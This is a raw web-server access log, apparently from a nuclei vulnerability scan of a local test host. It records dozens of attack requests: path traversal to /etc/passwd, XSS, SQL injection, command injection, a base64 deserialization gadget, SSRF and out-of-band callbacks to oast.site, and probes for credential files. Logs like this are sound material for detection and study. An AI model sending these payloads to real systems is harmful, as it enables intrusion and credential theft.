"18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?u=http://ca281d8smpvb9r2g07h0ctewdznz6hy4u.oast.site/&href=http://ca281d8smpvb9r2g07h07z6jkipfjxe6y.oast.site/&action=http://ca281d8smpvb9r2g07h08hwuzthpommof.oast.site/&host=ca281d8smpvb9r2g07h0wn1ccpsqqsbjr.oast.site&http_host=ca281d8smpvb9r2g07h03ksgng5ty9z67.oast.site&email=root@ca281d8smpvb9r2g07h04eh7oeczyjxaf.oast.site&url=http://ca281d8smpvb9r2g07h03sorebabn3kjz.oast.site/&load=http://ca281d8smpvb9r2g07h0rkj6yjgtpfzac.oast.site/&preview=http://ca281d8smpvb9r2g07h0guhnff8afwy7s.oast.site/&target=http://ca281d8smpvb9r2g07h0kfo7qbiykg58e.oast.site/&proxy=http://ca281d8smpvb9r2g07h0ujioigmbf6js4.oast.site/&from=http://ca281d8smpvb9r2g07h0fcynn66x5ygua.oast.site/&src=http://ca281d8smpvb9r2g07h0q1mti8dbqa98x.oast.site/&ref=http://ca281d8smpvb9r2g07h0578j9azs57hth.oast.site/&referrer=http://ca281d8smpvb9r2g07h0a5r5i4wkboqka.oast.site/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"cat_id=4'&get_seleted_Category=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /homeaction.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s3cmd.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfiler/Login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup ca281d8smpvb9r2g07h0i5uo39uptzeg7.oast.site\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /password_change.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652850882\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652850882\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/29K9NMOpsTtKiDTcd7IReCNZAN7/)%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) 